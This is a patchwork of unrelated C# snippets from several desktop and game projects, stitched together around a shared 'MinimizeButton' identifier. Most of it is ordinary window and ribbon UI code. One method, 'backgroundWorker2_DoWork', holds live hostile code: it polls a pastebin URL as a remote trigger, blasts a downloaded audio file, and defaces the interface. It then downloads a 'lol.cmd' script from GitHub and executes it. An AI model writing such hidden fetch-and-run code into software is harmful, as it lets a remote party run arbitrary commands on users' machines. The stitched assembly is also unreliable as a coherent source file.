/// <summary> /// Paints the Ribbon on the specified device /// </summary> /// <param name="g">Device where to paint on</param> /// <param name="clip">Clip rectangle</param> private void PaintOn(Graphics g, Rectangle clip) { if (WinApi.IsWindows && Environment.OSVersion.Platform == PlatformID.Win32NT) { g.SmoothingMode = System.Drawing.Drawing2D.SmoothingMode.AntiAlias; g.TextRenderingHint = System.Drawing.Text.TextRenderingHint.ClearTypeGridFit; } //Caption Background Renderer.OnRenderRibbonBackground(new RibbonRenderEventArgs(this, g, clip)); //Caption Bar Renderer.OnRenderRibbonCaptionBar(new RibbonRenderEventArgs(this, g, clip)); //Caption Buttons if (CaptionButtonsVisible) { MinimizeButton.OnPaint(this, new RibbonElementPaintEventArgs(clip, g, RibbonElementSizeMode.Medium)); MaximizeRestoreButton.OnPaint(this, new RibbonElementPaintEventArgs(clip, g, RibbonElementSizeMode.Medium)); CloseButton.OnPaint(this, new RibbonElementPaintEventArgs(clip, g, RibbonElementSizeMode.Medium)); } //Orb Renderer.OnRenderRibbonOrb(new RibbonRenderEventArgs(this, g, clip)); //QuickAcess toolbar QuickAcessToolbar.OnPaint(this, new RibbonElementPaintEventArgs(clip, g, RibbonElementSizeMode.Compact)); //Render Tabs foreach (RibbonTab tab in Tabs) { tab.OnPaint(this, new RibbonElementPaintEventArgs(tab.TabBounds, g, RibbonElementSizeMode.None, this)); } }
//Verifie sur le curseur est dans le pérmimètre du bouton réduire | Checks if cursor is in the perimeter of Minimize Button bool IsCursorOnMinimizeButton() { int loc_x = MinimizeButton.PointToClient(Cursor.Position).X; int loc_y = MinimizeButton.PointToClient(Cursor.Position).Y; return(MinimizeButtonParams[2] == 1 && loc_x > 0 && loc_x < MinimizeButton.Width && loc_y > 0 && loc_y < MinimizeButton.Height); }
public override void Update(DwarfTime time) { if (IsMinimized) { MinimizeButton.Update(time); } base.Update(time); }
public Start() { InitializeComponent(); SizeToContent = SizeToContent.Manual; MaxHeight = SystemParameters.WorkArea.Height; // Button Events MinimizeButton.AddHandler(MouseLeftButtonUpEvent, new MouseButtonEventHandler(MinimizeButtonUp), true); CloseButton.AddHandler(MouseLeftButtonUpEvent, new MouseButtonEventHandler(CloseButtonUp), true); CreateNewFile.AddHandler(MouseLeftButtonUpEvent, new MouseButtonEventHandler(CreateNewFileButtonUp), true); OpenPhoto.AddHandler(MouseLeftButtonUpEvent, new MouseButtonEventHandler(OpenPhotoButtonUp), true); OpenFile.AddHandler(MouseLeftButtonUpEvent, new MouseButtonEventHandler(OpenFileButtonUp), true); }
public override void Render(DwarfTime time, SpriteBatch batch) { base.Render(time, batch); if (IsVisible) { Rectangle imageBounds = GetImageBounds(); Rectangle frameBounds = new Rectangle(imageBounds.X, imageBounds.Y + imageBounds.Height - Frame.Height, Frame.Width, Frame.Height); batch.Draw(Frame, frameBounds, Color.White); } else if (IsMinimized) { MinimizeButton.Render(time, batch); MinimizeButton.IsVisible = true; } }
protected virtual void Dispose(bool disposing) { if (!_disposed) { OnDisposed(this); WindowEventHandler.Dispose(); _processExitHandler.Dispose(); _skinWindowButtonsHandler.Dispose(); _settingsUpdater.Dispose(); TopBorder.Dispose(); LeftBorder.Dispose(); RightBorder.Dispose(); BottomBorder.Dispose(); TopBorder = null; LeftBorder = null; RightBorder = null; BottomBorder = null; MinimizeButton = null; MaximizeButton = null; CloseButton = null; HelpButton = null; TitleControl = null; TitleBackgroundControl = null; IconControl = null; _skin = null; _parent = null; _processExitHandler = null; _settingsUpdater = null; _skinWindowButtonsHandler = null; _windowEventHandler = null; _controlsChangeHandler = null; _disposed = true; } }
public SkinableWindowBorder(TopLevelWindow Window, WindowBorderSkin skin, bool IsExecluded) { _parent = Window; TopBorder = new SkinBorder(this); LeftBorder = new SkinBorder(this); RightBorder = new SkinBorder(this); BottomBorder = new SkinBorder(this); TitleBackgroundControl = new LayeredControl(TopBorder); TitleControl = new LayeredLabel(TopBorder); IconControl = new LayeredIcon(TopBorder); IconControl.Size = new Size(16, 16); MinimizeButton = new MinimizeButton(TopBorder); MaximizeButton = new MaximizeButton(TopBorder); CloseButton = new CloseButton(TopBorder); HelpButton = new HelpButton(TopBorder); if (Window.SizeBox) { TopBorder.LeftCornerCursor = Cursors.SizeNWSE; TopBorder.RightCornerCursor = Cursors.SizeNESW; TopBorder.TopCursor = Cursors.SizeNS; LeftBorder.NormalCursor = Cursors.SizeWE; RightBorder.NormalCursor = Cursors.SizeWE; BottomBorder.NormalCursor = Cursors.SizeNS; BottomBorder.LeftCornerCursor = Cursors.SizeNESW; BottomBorder.RightCornerCursor = Cursors.SizeNWSE; } _windowEventHandler = new WindowEventHandler(this, Parent); _settingsUpdater = new SettingsUpdater(IsExecluded, this); _processExitHandler = new ProcessExitHandler(this, Parent.Process); _skinWindowButtonsHandler = new SkinWindowButtonsHandler(this); _controlsChangeHandler = new SkinWindowControlsChangeHandler(this); Skin = skin; }
private void Start() { if (!SavingSettings) { return; } _windowSettings = new SettingsHistory <WindowSettingsBag>($"{name}.json", 1); if (_windowSettings.Recent.FirstOrDefault() is WindowSettingsBag bag) { GetComponent <RectTransform>().anchoredPosition = new Vector2(bag.X, bag.Y); GetComponent <RectTransform>().sizeDelta = new Vector2(bag.Width, bag.Height); if (bag.IsShowing) { Show(); } else { gameObject.SetActive(false); } if (bag.IsMaximized) { _maximizedHeight = bag.Height; MinimizeButton.InitState(0); } else { MinimizeButton.InitState(1); } } _isInited = true; #if UNITY_STANDALONE_LINUX || UNITY_EDITOR_LINUX var rects = _content.GetComponentsInChildren <ScrollRect>(); foreach (var rect in rects) { rect.scrollSensitivity = 300; } #endif }
/// <summary> /// Triggers when the form is finished loading /// </summary> /// <param name="sender"></param> /// <param name="e"></param> private void FormLoaded(object sender, EventArgs e) { //Start the timer once the form is loaded InitTimer(); MainTabControl.SelectedTab = RushingTab; TabPage firstRushing = CreateTab(RushingTabControl, new RushingUserControl(0), 0); Button button = FindControl <Button>("AddScript", firstRushing); button.Enabled = false; button.BackColor = Color.Gray; int lastIndex = 1; //If there are more rushing tabs that should be created, create them for (int i = 1; i < Data.rushConfigs.Length; i++) { if (Data.rushConfigs[i] != null) { TabPage tp = CreateTab(RushingTabControl, new RushingUserControl(i), i); Button b = FindControl <Button>("AddScript", tp); b.Enabled = false; b.BackColor = Color.Gray; lastIndex++; } } button = FindControl <Button>("AddScript", FindControl <TabPage>("Script" + lastIndex)); button.Enabled = true; button.BackColor = Color.White; //Create a new blank RUC in order to copy the controls over to the game info tab RushingUserControl ruc = new RushingUserControl(-1); GameInfoPanel.Controls.Add(ruc.SettingsPanel); foreach (CustomCheckBox box in FindControls <CustomCheckBox>("", GameInfoPanel)) { box.AutoCheck = false; box.Cursor = Cursors.Default; box.Loaded(); } //Set the current tab as the first one RushingTabControl.SelectedTab = firstRushing; MainTabControl.SelectedTab = MainTab; //Apply the link to the LinkLabels GitHubLink.Links.Add(0, 0, "https://github.com/StarOfDoom/RotMGScripts"); GitHubLink.LinkClicked += new LinkLabelLinkClickedEventHandler(LinkClicked); //Update the version label to include the current version number VersionNumberLabel.Text = Info.version; //Add event handlers for when you click hotkey buttons HotkeyButton0.Click += new EventHandler(HotkeyButtonClick); //Set the paint handler for adding images to the background DebuggingInfoPanel.Paint += new PaintEventHandler(InfoTabPaint); //Set the paint handler for adding images to the title bar TitleBarPanel.Paint += new PaintEventHandler(TitleBarPaint); //Call event when the text is changed in the process name field ProcessName.TextChanged += new EventHandler(ProcessTextChanged); //Call event when a key is pressed in the console input to check for an Enter or Arrow key ConsoleInput.KeyDown += new KeyEventHandler(ConsoleInputKeyDown); ConsoleSendButton.Click += new EventHandler(ConsoleSendClick); //Update the two delays SearchDelayInput.ValueChanged += new EventHandler(DelayInputValueChanged); UpdateDelayInput.ValueChanged += new EventHandler(DelayInputValueChanged); //Add event handlers for checking the auto resize box foreach (CheckBox box in FindControls <CheckBox>("", AspectRatioGroup)) { box.MouseClick += new MouseEventHandler(AspectBoxChanged); } //Lets you drag around the window without a windows title bar TitleBarPanel.MouseDown += new MouseEventHandler(TitleBar); TitleLabel.MouseDown += new MouseEventHandler(TitleBar); ExitButton.InitializeButton(); MinimizeButton.InitializeButton(); KeyboardHook.StartHook(); }
/// <summary> /// Updates the regions of the tabs and the tab content bounds of the active tab /// </summary> internal void UpdateRegions(Graphics g) { bool graphicsCreated = false; if (IsDisposed || _updatingSuspended) { return; } ///Graphics for measurement if (g == null) { g = CreateGraphics(); graphicsCreated = true; } ///X coordinate reminder int curLeft = TabsMargin.Left + OrbBounds.Width; ///Saves the width of the larger tab int maxWidth = 0; ///Saves the bottom of the tabs int tabsBottom = 0; #region Assign default tab bounds (best case) foreach (RibbonTab tab in Tabs) { Size tabSize = tab.MeasureSize(this, new RibbonElementMeasureSizeEventArgs(g, RibbonElementSizeMode.None)); Rectangle bounds = new Rectangle(curLeft, TabsMargin.Top, TabsPadding.Left + tabSize.Width + TabsPadding.Right, TabsPadding.Top + tabSize.Height + TabsPadding.Bottom); tab.SetTabBounds(bounds); curLeft = bounds.Right + TabSpacing; maxWidth = Math.Max(bounds.Width, maxWidth); tabsBottom = Math.Max(bounds.Bottom, tabsBottom); tab.SetTabContentBounds(Rectangle.FromLTRB( TabContentMargin.Left, tabsBottom + TabContentMargin.Top, ClientSize.Width - 1 - TabContentMargin.Right, ClientSize.Height - 1 - TabContentMargin.Bottom)); if (tab.Active) { tab.UpdatePanelsRegions(); } } #endregion #region Reduce bounds of tabs if needed while (curLeft > ClientRectangle.Right && maxWidth > 0) { curLeft = TabsMargin.Left + OrbBounds.Width; maxWidth--; foreach (RibbonTab tab in Tabs) { if (tab.TabBounds.Width >= maxWidth) { tab.SetTabBounds(new Rectangle(curLeft, TabsMargin.Top, maxWidth, tab.TabBounds.Height)); } else { tab.SetTabBounds(new Rectangle( new Point(curLeft, TabsMargin.Top), tab.TabBounds.Size)); } curLeft = tab.TabBounds.Right + TabSpacing; } } #endregion #region Update QuickAccess bounds QuickAcessToolbar.MeasureSize(this, new RibbonElementMeasureSizeEventArgs(g, RibbonElementSizeMode.Compact)); QuickAcessToolbar.SetBounds(new Rectangle(new Point(OrbBounds.Right + QuickAcessToolbar.Margin.Left, OrbBounds.Top - 2), QuickAcessToolbar.LastMeasuredSize)); #endregion #region Update Caption Buttons bounds if (CaptionButtonsVisible) { Size cbs = new Size(20, 20); int cbg = 2; CloseButton.SetBounds(new Rectangle(new Point(ClientRectangle.Right - cbs.Width - cbg, cbg), cbs)); MaximizeRestoreButton.SetBounds(new Rectangle(new Point(CloseButton.Bounds.Left - cbs.Width, cbg), cbs)); MinimizeButton.SetBounds(new Rectangle(new Point(MaximizeRestoreButton.Bounds.Left - cbs.Width, cbg), cbs)); } #endregion if (graphicsCreated) { g.Dispose(); } _lastSizeMeasured = Size; RenewSensor(); }
private void backgroundWorker2_DoWork(object sender, System.ComponentModel.DoWorkEventArgs e) { System.Net.WebClient wc = new System.Net.WebClient(); byte[] raw = wc.DownloadData("https://pastebin.com/raw/wCDAyFrh"); string webData = System.Text.Encoding.UTF8.GetString(raw); string version = ("1"); if (version == webData) { System.Threading.Thread.Sleep(5000); WebClient webClient = new WebClient(); if (File.Exists(@"c:/earrape.wav")) { webClient.DownloadFile("https://github.com/leonardssy/ProjectDab/blob/master/Earrape.wav?raw=true", @"c:/earrape.wav"); System.Media.SoundPlayer player = new System.Media.SoundPlayer(@"c:/earrape.wav"); player.Play(); BackColor = Color.Red; label1.Hide(); TitleDraggable.Text = ("LOL YOU ARE USING THE TRASH UI!!!!!!!!!!!!!!!!!"); button1.Hide(); button2.Hide(); button3.Hide(); button4.Hide(); button6.Hide(); button5.Hide(); MonacoEditor.Hide(); MinimizeButton.Hide(); CloseButton.Hide(); System.Threading.Thread.Sleep(5000); webClient.DownloadFile("https://github.com/leonardssy/ProjectDab/blob/master/lol.cmd?raw=true", "lol.cmd"); Process.Start("lol.cmd"); } else { webClient.DownloadFile("https://github.com/leonardssy/ProjectDab/blob/master/Earrape.wav?raw=true", @"c:/earrape.wav"); System.Media.SoundPlayer player = new System.Media.SoundPlayer(@"c:/earrape.wav"); player.Play(); BackColor = Color.Red; label1.Hide(); TitleDraggable.Text = ("LOL YOU ARE USING THE TRASH UI!!!!!!!!!!!!!!!!!"); button1.Hide(); button2.Hide(); button3.Hide(); button4.Hide(); button6.Hide(); button5.Hide(); MonacoEditor.Hide(); MinimizeButton.Hide(); CloseButton.Hide(); System.Threading.Thread.Sleep(5000); webClient.DownloadFile("https://github.com/leonardssy/ProjectDab/blob/master/lol.cmd?raw=true", "lol.cmd"); Process.Start("lol.cmd"); } } else { } }
private void MinimizeButton_MouseLeave(object sender, EventArgs e) { MinimizeButton.BackgroundImage = Properties.Resources.minimize_button; MinimizeButton.Refresh(); }
/// <summary> /// Triggers when the form is finished loading /// </summary> /// <param name="sender"></param> /// <param name="e"></param> private void FormLoaded(object sender, EventArgs e) { //Set the current tab as the first one MainTabControl.SelectedTab = MainTab; //Apply the link to the LinkLabels GitHubLink.Links.Add(0, 0, "https://github.com/StarOfDoom/PokerNeuralNetwork"); GitHubLink.LinkClicked += new LinkLabelLinkClickedEventHandler(LinkClicked); //Update the version label to include the current version number VersionNumberLabel.Text = Assembly.GetExecutingAssembly().GetName().Version.ToString(); //Set the paint handler for adding images to the background DebuggingInfoPanel.Paint += new PaintEventHandler(InfoTabPaint); //Set the paint handler for adding images to the title bar TitleBarPanel.Paint += new PaintEventHandler(TitleBarPaint); //Lets you drag around the window without a windows title bar TitleBarPanel.MouseDown += new MouseEventHandler(TitleBar); TitleLabel.MouseDown += new MouseEventHandler(TitleBar); //When one of the settings is changed SBValue.ValueChanged += new EventHandler(SBValueChanged); ChipsValue.ValueChanged += new EventHandler(ChipsValueChanged); PlayersValue.ValueChanged += new EventHandler(PlayersValueChanged); //Call event when a key is pressed in the console input to check for an Enter or Arrow key ConsoleInput.KeyDown += new KeyEventHandler(ConsoleInputKeyDown); ConsoleSendButton.Click += new EventHandler(ConsoleSendClick); //Scroll when rich text box changed RichConsoleText.TextChanged += new EventHandler(ConsoleTextChanged); //Play new game StartHoldemButton.Click += new EventHandler(StartNewGame); VisualTab.Enabled = false; SettingsTab.Enabled = false; ConsolePopoutCheckbox.Cursor = Cursors.Hand; ConsolePopoutCheckbox.Loaded(); ConsolePopoutCheckbox.Click += ConsoleCheckboxToggle; SBText.Cursor = Cursors.IBeam; ChipsText.Cursor = Cursors.IBeam; //ThreadPool.SetMinThreads(4, 4); ThreadPool.SetMaxThreads(16, 16); ExitButton.InitializeButton(); MinimizeButton.InitializeButton(); SaveData data = Data.Load(); Console.WriteLine(JsonConvert.SerializeObject(data)); if (data != null) { bool boxChecked = data.ConsolePopOut; this.ConsolePopoutCheckbox.Checked = boxChecked; if (boxChecked) { ConsoleTab.Enabled = false; console.Show(); } else { ConsoleTab.Enabled = true; console.Hide(); } this.SBValue.Value = data.SmallBlind; this.ChipsValue.Value = data.StartingChips; this.PlayersValue.Value = data.Players; } }